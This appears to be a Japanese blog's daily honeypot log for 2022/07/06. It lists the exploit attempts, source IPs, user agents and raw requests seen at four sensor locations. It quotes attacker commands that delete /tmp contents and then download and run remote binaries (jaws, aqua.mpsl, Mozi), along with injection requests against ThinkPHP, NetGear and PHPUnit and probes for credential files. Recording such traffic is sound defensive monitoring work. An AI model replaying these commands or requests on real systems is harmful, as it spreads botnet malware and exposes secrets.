コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2022/07/06 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2022/07/06分です。

特徴
共通

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
/.envへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為

Location:JP

NetGear製品の脆弱性を狙うアクセス
/.awsへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 163.123.142.144/jaws;
sh /tmp/jaws
cd /tmp;
rm -rf *;
wget http://104.248.11.133/bins/aqua.mpsl;
sh /tmp/aqua.mpsl
Location:US

curlによるスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget jx.qingdaosheng.com/jaws;
sh /tmp/jaws
Location:UK

JBoss脆弱性を狙うアクセス
curlによるスキャン行為
.jsへのスキャン行為
/.awsへのスキャン行為
Apache Tomcatへのスキャン行為
UserAgentがHello, Worldであるアクセス

を確認しました。

Location:SG

curlによるスキャン行為
/.gitへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http://104.248.11.133/bins/aqua.mpsl;
sh /tmp/aqua.mpsl
アクセス数推移

JP:総アクセス数:124 (前日比:-1)
US:総アクセス数:75 (前日比:-142)
UK:総アクセス数:425 (前日比:359)
SG:総アクセス数:76 (前日比:-31)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
36 5.62.58.233 United Kingdom
1 20.116.184.224 United States
1 20.248.190.236 United States
2 35.228.200.226 United States
1 45.72.78.5 Canada
1 51.13.99.186 United Kingdom
2 92.255.85.183 Hong Kong
16 95.214.235.205 Ukraine
1 103.217.123.182 India
2 109.237.103.9 Russia
2 109.237.103.38 Russia
7 135.125.244.48 France
8 135.125.246.110 France
1 137.184.87.163 United States
12 141.95.91.126 France
1 148.74.16.91 United States
1 161.35.142.70 United States
1 164.92.81.83 United States
1 172.245.10.76 United States
1 175.10.44.176 China
1 179.43.156.214 Panama
1 182.127.179.159 China
16 185.7.214.104 Hong Kong
1 185.196.220.81 Netherlands
1 190.213.155.143 Trinidad and Tobago
1 192.241.219.73 United States
1 198.235.24.132 United States
1 198.235.24.161 United States
1 200.110.58.6 Bolivia
1 203.251.54.203 South Korea
1 220.198.207.252 China

UserAgent一覧

件数 UserAgent
13 -
1 Go-http-client/1.1
1 Hello, World
3 Hello, world
12 Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36
2 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
16 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0
75 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36

リクエスト内容一覧

件数 Method Request Protocol
1 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
1 MGLNDD_18.179.20.5_80\n
2 \x03
1 \x16\x03\x01\x01C\x01
1 \x16\x03\x01\x01D\x01
3 \x16\x03\x01
1 GET /.aws/ HTTP/1.1
1 GET /.aws/config HTTP/1.1
2 GET /.aws/credentials HTTP/1.1
1 GET /.config HTTP/1.1
1 GET /.env.bak HTTP/1.1
42 GET /.env HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
2 GET /_profiler/phpinfo HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /admin/.env HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /beta/.env HTTP/1.1
2 GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0
1 GET /cgi-bin/admin_console.cgi HTTP/1.1
1 GET /config.js/config/aws.yml HTTP/1.1
1 GET /config.json HTTP/1.1
1 GET /config/aws.yml HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /debug/default/view?panel=config HTTP/1.1
2 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /info-php.php HTTP/1.1
2 GET /info.php HTTP/1.1
1 GET /info_php.php HTTP/1.1
1 GET /infophp.php HTTP/1.1
1 GET /kyc/.env HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /laravel/core/.env HTTP/1.1
1 GET /misc/info.php HTTP/1.1
1 GET /misc/phpinfo.php HTTP/1.1
1 GET /misc/phpinfo HTTP/1.1
1 GET /p-info.php HTTP/1.1
1 GET /p_info.php HTTP/1.1
1 GET /php-info HTTP/1.1
1 GET /php/info.php HTTP/1.1
1 GET /php/phpinfo.php HTTP/1.1
1 GET /php/phpinfo HTTP/1.1
1 GET /php_details HTTP/1.1
1 GET /php_info.php HTTP/1.1
1 GET /phpdetails HTTP/1.1
2 GET /phpinfo.php HTTP/1.1
2 GET /phpinfo HTTP/1.1
1 GET /phpinformation.php HTTP/1.1
1 GET /phpinformation HTTP/1.1
1 GET /pinfo.php HTTP/1.1
1 GET /prod/.env HTTP/1.1
1 GET /public/.env HTTP/1.1
1 GET /root/.env HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+163[.]123[.]142[.]144/jaws;sh+/tmp/jaws HTTP/1.1
2 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//104[.]248[.]11[.]133/bins/aqua.mpsl;sh+/tmp/aqua.mpsl HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /test.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /z.php HTTP/1.1
1 OPTIONS / HTTP/1.0
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
4 20.5.59.74 United States
1 20.230.51.173 United States
1 40.122.156.127 United States
18 51.79.29.48 Canada
1 51.142.148.13 United Kingdom
2 51.159.164.227 France
1 92.255.85.183 Hong Kong
2 109.237.103.9 Russia
2 109.237.103.123 Russia
1 139.59.85.127 Singapore
12 141.95.91.126 France
1 161.35.142.98 United States
1 162.62.62.213 Singapore
1 162.142.125.9 United States
1 164.92.81.83 United States
2 167.99.118.192 United States
1 179.43.156.214 Panama
13 185.7.214.104 Hong Kong
1 185.196.220.81 Netherlands
7 185.254.196.223 Ukraine
1 192.241.214.4 United States
1 205.210.31.26 United States

UserAgent一覧

件数 UserAgent
6 -
1 Go-http-client/1.1
1 Hello, world
1 Java/1.8.0_333
12 Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36
13 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0
37 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0
2 curl/7.81.0

リクエスト内容一覧

件数 Method Request Protocol
1 MGLNDD_34.68.118.83_80\n
1 \x03
2 \x16\x03\x01\x01D\x01
1 \x16\x03\x01
1 CONNECT dashboard[.]iproyal[.]com:443 HTTP/1.1
1 GET /.aws/ HTTP/1.1
1 GET /.aws/config HTTP/1.1
1 GET /.aws/credentials HTTP/1.1
1 GET /.config HTTP/1.1
1 GET /.env.bak HTTP/1.1
34 GET /.env HTTP/1.1
1 GET /.git/HEAD HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /_profiler/phpinfo HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /app/.env HTTP/1.1
1 GET /cgi-bin/admin_console.cgi HTTP/1.1
1 GET /config.json HTTP/1.1
1 GET /config/aws.yml HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /core/.env HTTP/1.1
1 GET /debug/default/view?panel=config HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /phpinfo.php HTTP/1.1
1 GET /phpinfo HTTP/1.1
1 GET /public/.env HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+jx[.]qingdaosheng[.]com/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 HEAD / HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 PRI * HTTP/2.0
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
8 18.142.231.185 United States
1 20.234.101.72 United States
1 35.201.177.71 United States
2 35.203.53.179 United States
1 51.142.93.11 United Kingdom
2 51.159.164.227 France
1 69.61.242.98 United States
1 104.129.48.126 United States
2 109.237.103.9 Russia
2 109.237.103.38 Russia
2 109.237.103.123 Russia
1 124.218.150.114 Taiwan
1 167.94.138.119 United States
1 167.94.145.58 United States
1 167.248.133.120 United States
1 172.104.138.223 United States
10 185.7.214.104 Hong Kong
382 185.125.206.165 United Kingdom
1 185.196.220.81 Netherlands
1 192.241.222.69 United States
1 198.235.24.30 United States
1 205.210.31.151 United States
1 209.141.51.222 United States

UserAgent一覧

件数 UserAgent
63 -
1 Hello, World
2 Java/1.8.0_333
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
10 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0
8 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
335 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 curl/7.81.0

リクエスト内容一覧

件数 Method Request Protocol
1 MGLNDD_132.145.66.34_80\n
1 \x16\x03\x01\x01C\x01
2 \x16\x03\x01\x01D\x01
51 \x16\x03\x01\x02
3 \x16\x03\x01
1 CONNECT api[.]cyberghostvpn[.]com:443 HTTP/1.1
1 CONNECT www[.]movistar[.]es:443 HTTP/1.1
1 GET /%C0 HTTP/1.1
1 GET /.aws/credentials HTTP/1.1
1 GET /.env.bak HTTP/1.1
1 GET /.env.dev HTTP/1.1
1 GET /.env.example HTTP/1.1
1 GET /.env.php HTTP/1.1
5 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=3g5k34sz HTTP/1.1
1 GET /__tests__/test-become/.env HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /_profiler/phpinfo HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /admin/.env HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /app/.env HTTP/1.1
1 GET /app/config/.env HTTP/1.1
1 GET /apps/.env HTTP/1.1
1 GET /audio/.env HTTP/1.1
1 GET /aws.env HTTP/1.1
1 GET /aws.yml HTTP/1.1
1 GET /backend/.env HTTP/1.1
1 GET /base/.env HTTP/1.1
1 GET /blog/.env HTTP/1.1
1 GET /blogs/.env HTTP/1.1
1 GET /cgi-bin/.env HTTP/1.1
1 GET /client/.env HTTP/1.1
1 GET /conf/.env HTTP/1.1
1 GET /config.js HTTP/1.1
1 GET /config/aws.yml HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /core/.env HTTP/1.1
1 GET /crm/.env HTTP/1.1
1 GET /database/.env HTTP/1.1
1 GET /debug/default/view.html HTTP/1.1
2 GET /debug/default/view?panel=config HTTP/1.1
1 GET /debug/default/view HTTP/1.1
1 GET /docs/.env HTTP/1.1
1 GET /download/.env HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /frontend/web/debug/default/view HTTP/1.1
1 GET /fuN3 HTTP/1.0
1 GET /gists/cache HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /invoker/readonly HTTP/1.1
1 GET /jenkins/login HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /lib/.env HTTP/1.1
1 GET /library/.env HTTP/1.1
1 GET /local/.env HTTP/1.1
1 GET /login HTTP/1.1
1 GET /main/.env HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /new/.env HTTP/1.1
1 GET /newsite/.env HTTP/1.1
1 GET /old/.env HTTP/1.1
1 GET /phpinfo.php HTTP/1.1
1 GET /phpinfo HTTP/1.1
1 GET /protected/.env HTTP/1.1
1 GET /public/.env HTTP/1.1
1 GET /redmine/.env HTTP/1.1
1 GET /sapi/debug/default/view HTTP/1.1
1 GET /script HTTP/1.1
1 GET /sendgrid.env HTTP/1.1
1 GET /shared/.env HTTP/1.1
1 GET /site/.env HTTP/1.1
1 GET /sites/.env HTTP/1.1
1 GET /sites/all/libraries/mailchimp/.env HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /src/.env HTTP/1.1
1 GET /storage/.env HTTP/1.1
2 GET /symfony/public/_profiler/phpinfo HTTP/1.1
1 GET /tool/view/phpinfo.view.php HTTP/1.1
1 GET /uploads/.env HTTP/1.1
1 GET /vendor/.env HTTP/1.1
1 GET /vendor/laravel/.env HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /web/.env HTTP/1.1
1 GET /web/debug/default/view HTTP/1.1
1 GET /wp-admin/.env HTTP/1.1
1 GET /wp-config.php-backup HTTP/1.1
1 GET /wp-content/.env HTTP/1.1
1 GET /www/.env HTTP/1.1
1 HEAD / HTTP/1.1
1 HEAD /robots.txt HTTP/1.0
1 OPTIONS / HTTP/1.0
21 POST /%C0 HTTP/1.1
1 POST /.env.dev HTTP/1.1
1 POST /.env.example HTTP/1.1
1 POST /.env.php HTTP/1.1
1 POST /.env HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /__tests__/test-become/.env HTTP/1.1
1 POST /_ignition/execute-solution HTTP/1.1
1 POST /admin/.env HTTP/1.1
1 POST /api/.env HTTP/1.1
1 POST /app/.env HTTP/1.1
1 POST /app/config/.env HTTP/1.1
1 POST /apps/.env HTTP/1.1
1 POST /audio/.env HTTP/1.1
1 POST /aws.env HTTP/1.1
1 POST /backend/.env HTTP/1.1
1 POST /base/.env HTTP/1.1
1 POST /blog/.env HTTP/1.1
1 POST /blogs/.env HTTP/1.1
2 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /cgi-bin/.env HTTP/1.1
1 POST /client/.env HTTP/1.1
1 POST /conf/.env HTTP/1.1
1 POST /core/.env HTTP/1.1
1 POST /crm/.env HTTP/1.1
1 POST /database/.env HTTP/1.1
21 POST /debug/default/view.html HTTP/1.1
42 POST /debug/default/view?panel=config HTTP/1.1
21 POST /debug/default/view HTTP/1.1
1 POST /docs/.env HTTP/1.1
1 POST /download/.env HTTP/1.1
21 POST /frontend/web/debug/default/view HTTP/1.1
1 POST /gists/cache HTTP/1.1
1 POST /laravel/.env HTTP/1.1
1 POST /lib/.env HTTP/1.1
1 POST /library/.env HTTP/1.1
1 POST /local/.env HTTP/1.1
1 POST /main/.env HTTP/1.1
1 POST /new/.env HTTP/1.1
1 POST /newsite/.env HTTP/1.1
1 POST /old/.env HTTP/1.1
1 POST /protected/.env HTTP/1.1
1 POST /public/.env HTTP/1.1
1 POST /redmine/.env HTTP/1.1
21 POST /sapi/debug/default/view HTTP/1.1
1 POST /sendgrid.env HTTP/1.1
1 POST /shared/.env HTTP/1.1
1 POST /site/.env HTTP/1.1
1 POST /sites/.env HTTP/1.1
1 POST /sites/all/libraries/mailchimp/.env HTTP/1.1
1 POST /src/.env HTTP/1.1
1 POST /storage/.env HTTP/1.1
21 POST /tool/view/phpinfo.view.php HTTP/1.1
1 POST /uploads/.env HTTP/1.1
1 POST /vendor/.env HTTP/1.1
1 POST /vendor/laravel/.env HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /web/.env HTTP/1.1
21 POST /web/debug/default/view HTTP/1.1
1 POST /wp-admin/.env HTTP/1.1
21 POST /wp-config.php-backup HTTP/1.1
1 POST /wp-content/.env HTTP/1.1
1 POST /www/.env HTTP/1.1
3 PRI * HTTP/2.0
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 20.55.53.144 United States
2 20.125.118.24 United States
1 20.187.87.43 United States
2 34.95.176.206 United States
20 51.79.29.48 Canada
2 51.159.164.227 France
1 92.255.85.183 Hong Kong
2 109.237.103.9 Russia
2 109.237.103.38 Russia
2 109.237.103.123 Russia
1 139.59.85.127 Singapore
4 154.198.211.137 United States
1 161.35.142.70 United States
1 161.35.142.105 United States
1 162.142.125.219 United States
1 167.248.133.44 United States
1 179.43.156.214 Panama
17 185.7.214.104 Hong Kong
1 185.196.220.81 Netherlands
1 185.199.226.20 Canada
8 185.254.196.223 Ukraine
1 192.241.219.35 United States
1 197.238.200.112 Tunisia
1 205.210.31.9 United States
1 205.210.31.24 United States

UserAgent一覧

件数 UserAgent
12 -
4 Go-http-client/1.1
1 Hello, world
17 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0
36 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0
1 Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
2 curl/7.81.0

リクエスト内容一覧

件数 Method Request Protocol
1 MGLNDD_13.67.44.234_80
1 \x03
1 \x16\x03\x01\x01C\x01
2 \x16\x03\x01\x01D\x01
4 \x16\x03\x01
36 GET /.env HTTP/1.1
1 GET /.git/HEAD HTTP/1.1
1 GET /.git/config HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /cgi-bin/admin_console.cgi HTTP/1.1
2 GET /console/ HTTP/1.1
2 GET /favicon.ico HTTP/1.1
2 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /lzRIvQUe9qKXPkWs5yLaO7VNiBX HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//104[.]248[.]11[.]133/bins/aqua.mpsl;sh+/tmp/aqua.mpsl HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 HEAD / HTTP/1.1
1 OPTIONS / HTTP/1.0
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 PRI * HTTP/2.0